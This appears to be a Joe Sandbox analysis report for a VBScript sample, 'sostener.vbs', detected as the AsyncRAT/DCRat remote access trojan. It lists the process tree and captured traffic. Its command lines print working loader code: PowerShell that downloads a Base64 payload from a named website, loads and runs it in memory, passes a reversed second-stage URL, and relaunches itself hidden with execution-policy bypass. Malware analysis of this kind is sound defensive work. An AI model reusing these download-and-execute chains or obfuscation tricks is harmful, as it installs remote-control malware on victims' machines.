2024-09-26 08:57:24 UTC	16384	IN	Data Raw: e3 81 82 e3 81 82 67 67 45 e3 81 82 e3 81 82 e3 81 82 4d e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 6f e3 81 82 e3 81 82 e3 81 82 70 e3 81 82 e3 81 82 e3 81 82 49 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 6f e3 81 82 e3 81 82 e3 81 82 6e e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 73 e3 81 82 e3 81 82 e3 81 82 51 e3 81 82 e3 81 82 e3 81 82 49 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 45 77 35 e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 73 e3 81 82 e3 81 82 e3 81 82 51 e3 81 82 e3 81 82 e3 81 82 49 e3 81 82 e3 Data Ascii: ggEMopIonEsQIEw5EsQI
2024-09-26 08:57:24 UTC	8089	IN	Data Raw: 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 77 51 e3 81 82 e3 81 82 e3 81 82 51 e3 81 82 e3 81 82 e3 81 82 4d 54 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 71 6f e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 4d 42 4b 43 34 68 4b 47 6f 67 42 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 51 44 6f e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 4c 57 45 77 4b 58 45 42 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 63 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 67 44 e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 4d 54 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 Data Ascii: wQQMTqoMBKC4hKGogBQDoLWEwKXEBcgDEMT

Target ID:	0
Start time:	04:56:56
Start date:	26/09/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
Imagebase:	0x7ff661700000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	04:56:58
Start date:	26/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.2534304751.00000155DC4F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_DLAgent09, Description: Detects known downloader agent, Source: 00000004.00000002.2534304751.00000155DC4F0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.2090885360.00000155C41C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000004.00000002.2090885360.00000155C41C4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	04:57:00
Start date:	26/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	8
Start time:	04:57:02
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x7a0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	9
Start time:	04:57:03
Start date:	26/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	11
Start time:	04:57:13
Start date:	26/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' "
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	13
Start time:	04:57:15
Start date:	26/09/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs"
Imagebase:	0x7ff661700000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	14
Start time:	04:57:16
Start date:	26/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	17
Start time:	04:57:18
Start date:	26/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report sostener.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: AsyncRAT

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

DDoS

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1bbieuuo.srz.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1tjq2qvv.kek.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_24qj5dcd.v4v.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2dqtwux2.aqg.ps1

Windows Analysis Report
sostener.vbs

Target ID:	18
Start time:	04:57:19
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	20
Start time:	04:57:21
Start date:	26/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	23
Start time:	04:57:22
Start date:	26/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' "
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	25
Start time:	04:57:23
Start date:	26/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	26
Start time:	04:57:24
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0xe90000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 0000001A.00000002.2343267450.0000000001509000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000001A.00000002.2331186217.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 0000001A.00000002.2331186217.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 0000001A.00000002.2386589663.0000000003131000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Target ID:	27
Start time:	04:57:27
Start date:	26/09/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs"
Imagebase:	0x7ff661700000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	30
Start time:	04:57:28
Start date:	26/09/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
Imagebase:	0x7ff661700000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	33
Start time:	04:57:30
Start date:	26/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000021.00000002.2793866781.000001C03CB30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000021.00000002.2793866781.000001C03CB30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Target ID:	35
Start time:	04:58:02
Start date:	26/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	38
Start time:	04:58:03
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x120000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true